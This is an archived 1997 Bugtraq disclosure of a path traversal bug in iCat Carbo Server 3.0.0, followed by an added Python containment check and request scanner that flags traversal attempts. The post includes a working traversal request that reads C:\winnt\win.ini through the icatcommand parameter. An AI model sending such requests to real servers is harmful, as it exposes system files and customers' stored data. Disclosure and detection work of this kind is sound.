Bugtraq mailing list archives
Security bug in iCat Suite version 3.0
From: Mikael.Johansson () ABC SE (Mikael Johansson)
Date: Sat, 8 Nov 1997 11:11:12 +0100
iCat Carbo Server is a program used to create interactive shopping catalogs for the www. It was selected by PC Magazine's editors as the best Web storefront creation software.

I've found a bug in the iCat Carbo Server Version 3.0.0. The bug lets everyone view any file at a system that is using Carbo (except for files with some special characters).

See for yourselves...

http request:
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

http answer:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'

To view their c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

As you can imagine this bug is rather dangerous. For example an evil hacker could steal credit card information from users that have bought something at a site using Carbo Server 3.0.0.

Mikael Johansson
Mikael.Johansson () abc se
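Added example, not part of the original post and not iCat's code: a containment check of the kind the icatcommand value needed before being joined to the template directory, plus a scan that flags request URLs whose value escapes it. The root C:\web\carbohome comes from the quoted error message; the function names, the ".htm" defaulting rule and the sample requests are assumptions constructed for illustration.

```python
import ntpath  # Windows path rules, usable on any platform
from urllib.parse import urlsplit, parse_qs

# Template root as shown in the error message quoted in the post.
CARBO_HOME = r"C:\web\carbohome"

def resolve_template(name, root=CARBO_HOME):
    """Return the absolute template path, or None if it would leave root."""
    if not name or "\x00" in name:
        return None
    name = name.replace("/", "\\")
    # Reject drive letters, stream syntax, rooted and UNC paths outright.
    if ":" in name or name.startswith("\\"):
        return None
    # Assumption: a bare name gets ".htm", as in the quoted error message.
    if not ntpath.splitext(name)[1]:
        name += ".htm"
    # Collapse ".." segments first, then test containment on the result.
    candidate = ntpath.normpath(ntpath.join(root, name))
    prefix = ntpath.normcase(ntpath.normpath(root)) + "\\"
    # Trailing separator in the prefix keeps C:\web\carbohome2 out.
    if not ntpath.normcase(candidate).startswith(prefix):
        return None
    return candidate

def flag_requests(urls):
    """Return the URLs whose icatcommand value resolves outside the root."""
    flagged = []
    for url in urls:
        query = parse_qs(urlsplit(url).query)  # percent-decodes values
        values = query.get("icatcommand", [])
        if any(resolve_template(v) is None for v in values):
            flagged.append(url)
    return flagged

# Constructed sample requests (host and catalog names as in the post).
SAMPLE = [
    "http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog",
    "http://host/carbo.dll?icatcommand=..\\..\\winnt\\win.ini&catalogname=catalog",
    "http://host/carbo.dll?icatcommand=..%5C..%5Cwinnt%5Cwin.ini&catalogname=catalog",
    "http://host/carbo.dll?icatcommand=sub/../file_to_view&catalogname=catalog",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE):
        print("outside template root:", hit)
```

The check runs on the normalized path rather than searching the raw string for "..", so the percent-encoded request is caught and the harmless "sub/../file_to_view" is still served.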